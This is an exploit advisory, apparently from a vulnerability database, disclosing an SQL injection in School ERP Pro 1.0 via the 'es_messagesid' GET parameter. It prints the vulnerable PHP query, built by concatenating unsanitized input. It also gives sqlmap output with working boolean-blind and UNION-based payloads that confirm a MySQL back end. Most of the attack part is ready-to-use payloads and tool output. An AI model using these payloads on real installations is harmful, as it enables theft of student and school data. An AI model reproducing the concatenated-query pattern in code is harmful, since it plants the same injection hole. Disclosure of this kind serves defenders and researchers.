School ERP Pro 1.0 SQL Injection

2020.05.01
Credit: Besim Altinok
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: ─░smail BOZKURT SQL Injection Detail -------------------------------- *# Vulnerable parameter: es_messagesid* *# Vulnerable code:* if($action=="fullmessage_sent"){ $msg_qry ="SELECT * FROM es_messages WHERE from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and es_messagesid=".*$es_messagesid;* $details_message=$db->getrow($msg_qry); } ?> *Here is the SQLmap output:* *----------------------------------------* GET parameter '*es_messagesid*' is vulnerable. sqlmap identified the following injection point(s): --- Parameter: es_messagesid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT 6369=6369 Type: UNION query Title: Generic UNION query (random number) - 12 columns Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL SELECT 6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- - --- [01:09:41] [INFO] testing MySQL [01:09:42] [INFO] confirming MySQL [01:09:44] [INFO] the back-end DBMS is MySQL


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top